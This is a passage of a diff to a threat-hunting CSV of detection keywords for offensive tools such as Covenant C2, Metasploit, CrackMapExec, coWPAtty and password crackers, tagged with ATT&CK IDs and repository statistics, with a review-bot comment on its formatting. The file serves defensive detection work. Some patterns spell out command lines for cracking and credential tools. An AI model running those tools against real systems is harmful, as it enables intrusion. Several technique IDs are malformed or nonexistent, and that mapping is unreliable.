- TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantUserLogin.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantUserLoginResult.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantUserRegister.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Could not write NTLM Hashes to the specified JTR_Dump_Path *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*Couldn't clone GPO {} (maybe it does not exist?*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - 
T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*Covenant.API*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.Models*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" 
+"*Covenant.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant/wwwroot*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantAPI.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantAPIExtensions.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 
- T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantBaseMenuItem.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantService.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUser.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserLogin.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserLoginResult.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserRegister.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*covid19_koadic.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*cow-branded-longhorn.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*cow-branded-longhorn.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cowpatty -f *.txt -r *.cap -s *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Cowpatty*","offensive_tool_keyword","Cowpatty","coWPAtty - Brute-force dictionary attack against WPA-PSK.","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/joswr1ght/cowpatty","1","1","N/A","N/A","2","152","34","2018-12-04T22:26:47Z","2017-08-14T20:33:22Z" "*cowsay -f dragon 'PEzor!!*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" 
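Review bot: The technique IDs in the added Covenant rows (`+"*Covenant.API*"` through `+"*CovenantUserRegister.*"`) are written with a hyphen, as in `T1573-001`, `T1059-001` and `T1574-001`, while the mimikatz row in this same hunk uses the ATT&CK dot form, `T1078.002`. Since ` - ` is also the list separator in that column, a consumer that splits the field or joins it against ATT&CK data will not match the hyphenated values; the refreshed metasploit rows have a related problem in `T1204 -T1210`, where the separator has lost a space. As these rows are rewritten by the refresh anyway, I would normalise them to the dot form (`T1573.001 - T1573.002 - …`) and to `T1204 - T1210`, and validate each entry of the column on every refresh with a pattern such as `^T\d{4}(\.\d{3})?$`. It is also worth checking the sub-technique numbers against the current ATT&CK matrix, since some of them (for example `T1573-005`) do not look like published IDs.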
@@ -8793,60 +8941,60 @@
 "*cp sliver-* /opt/tools/bin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*cpp_test_payload.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
 "*Cr3dOv3r*","offensive_tool_keyword","Cr3dOv3r","Know the dangers of credential reuse attacks.","T1110 - T1555 - T1003","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/D4Vinci/Cr3dOv3r","1","1","N/A","N/A","10","1902","437","2019-03-28T14:53:38Z","2017-11-13T20:49:57Z"
-"*cracf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*crack_databases.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*crack_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*cracf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*crack_databases.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*crack_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*Crack-allDBs.git*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
 "*Crack-allDBs-main*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
 "*crack-allDBs-v1.py*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
 "*crack-allDBs-v2.py*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
 "*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*cracklord-master.*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
-"*cracklord-queued*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
-"*cracklord-resourced*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
-"*crackmapexec*","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"*CrackMapExec*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"*crackmapexec.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"*crackmapexec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"*crackmapexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z"
-"*crackmapexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z"
+"*cracklord-master.*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
+"*cracklord-queued*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
+"*cracklord-resourced*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
+"*crackmapexec*","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*CrackMapExec*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*crackmapexec.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*crackmapexec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*crackmapexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
